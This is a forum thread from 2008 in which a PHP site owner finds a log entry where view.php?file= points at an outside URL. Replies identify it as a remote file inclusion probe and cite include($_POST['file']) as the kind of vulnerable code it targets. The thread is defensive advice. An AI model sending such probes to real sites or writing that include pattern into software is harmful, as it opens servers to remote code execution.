/    Sign up×
Community /Pin to ProfileBookmark

Possible Hijacking Problem

Copy linkTweet thisAlerts:
Apr 05.2008

I was checking my log file and noticed something unusual:

[code=php]78.76.64.123 – – [04/Apr/2008:19:19:35 -0500] “GET /view.php?file=http://myweddingphotos.by.ru/images? HTTP/1.1” 200 17116 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)”[/code]

I have this on a Web page that displays a list of article titles. When you click on a title the view.php opens with that article:

[code=php]<a href=’view.php?file=$id’>$title</a>[/code]

But as you can see above it appears that someone has replaced the file number of the article with another website.

Can anyone tell me what is happening and how I can stop it?

Thanks.
Alan

to post a comment
PHP

9 Comments(s)

Copy linkTweet thisAlerts:
@LiLcRaZyFuZzYApr 06.2008 — odd, i'd also be interested what they gain by doing this

anyone?
Copy linkTweet thisAlerts:
@chazzyApr 06.2008 — It looks like someone found a possible vulnerability in your script, and was trying to inject something into your site. do you have any known security holes?
Copy linkTweet thisAlerts:
@chazzyApr 06.2008 — and by looking at the output of the target url, it looks like someone is trying to hack your site.
Copy linkTweet thisAlerts:
@Alan_PauthorApr 07.2008 — do you have any known security holes?[/QUOTE]
None that I know of, but then I really haven't gone looking for any because I probably would know one if I saw it.

Is there any specific thing I should be looking for?

I haven't found anything wrong with my site; when I click on a title I get what I clicked on. So I don't know if this is a failed attempt or if they have found some secretive way to use my site to propagate their filth.
Copy linkTweet thisAlerts:
@bokehApr 07.2008 — Some people write terrible code like:[code=php]include($_POST['file']);[/code]If you try enough sites eventually you will find one that is vulnerable and the remote code will be executed.
Copy linkTweet thisAlerts:
@Alan_PauthorApr 07.2008 — What specifically are they trying to do; have one of their porn pictures open on my site?

I don't use an include in conjunction with a _POST, so I guess I'm good there.
Copy linkTweet thisAlerts:
@LiLcRaZyFuZzYApr 07.2008 — I guess as long as you don't include anything or write to db directly without proper checking you should be alright
Copy linkTweet thisAlerts:
@Alan_PauthorApr 08.2008 — All my database entry forms are located in an admin area, which is password protected by an htaccess file on the server.

I also use this on my post variables:
[code=php]$article = mysql_real_escape_string($_POST['article']);[/code]
Copy linkTweet thisAlerts:
@bokehApr 08.2008 — What specifically are they trying to do[...]?[/QUOTE]Who cares what they are trying to do? Just make your site as secure as possible (test all inputs, etc.) and then quit worrying about what makes these strangers want to vandalize or steal from your website.
×

Success!

Help @Alan_P spread the word by sharing this article on Twitter...

Tweet This
Sign in
Forgot password?
Sign in with TwitchSign in with GithubCreate Account
about: ({
version: 0.1.9 BETA 6.1,
whats_new: community page,
up_next: more Davinci•003 tasks,
coming_soon: events calendar,
social: @webDeveloperHQ
});

legal: ({
terms: of use,
privacy: policy
});
changelog: (
version: 0.1.9,
notes: added community page

version: 0.1.8,
notes: added Davinci•003

version: 0.1.7,
notes: upvote answers to bounties

version: 0.1.6,
notes: article editor refresh
)...
recent_tips: (
tipper: @AriseFacilitySolutions09,
tipped: article
amount: 1000 SATS,

tipper: @Yussuf4331,
tipped: article
amount: 1000 SATS,

tipper: @darkwebsites540,
tipped: article
amount: 10 SATS,
)...